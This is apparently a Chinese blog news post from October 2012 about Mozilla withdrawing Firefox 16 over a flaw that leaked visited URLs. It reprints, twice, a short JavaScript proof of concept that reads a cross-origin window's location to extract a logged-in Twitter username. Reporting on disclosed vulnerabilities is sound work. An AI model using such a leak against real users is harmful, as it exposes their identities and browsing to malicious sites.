Firefox 16漏洞的攻击代码公开

发表于 2012年10月15日
周边

就在Mozilla发布了正式版Firefox 16之后没几天，该公司对外发布消息–将暂时从Mozilla下载主页移除最新版本浏览器的下载，而这么做的原因源自于存在于其中的一个安全漏洞。

Mozilla公司方面表示也会尽快地修复这一漏洞。从“移除”这一举动来看，此次的安全漏洞绝非小事，不过到目前为止还没有任何详细的消息公布。

早前，Mozilla安全保障部门的总监Michael Coates在网站上写道，“此次发现的漏洞将很可能导致一个恶意网站可以收集到用户访问过的网站、URL极其参数，到目前为止我们并没有发现有相关用户受到该漏洞的影响报告。”

另外，Mozilla建议用户可以将最新版的Firefox 16降级到15.0.1版本。

攻击代码：

function poc(){
var win = window.open('https://twitter.com/lists/', 'newWin', 'width=200, height=200');
setTimeout(function(){
alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1]) }, 5000);
}

function poc(){

var win = window.open('https://twitter.com/lists/', 'newWin', 'width=200, height=200');

setTimeout(function(){

alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1]) }, 5000);

}

标签：exploit code , Firefox 原文连接：Firefox 16漏洞的攻击代码公开 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

佛教四大经典爱情故事关于博客增加作者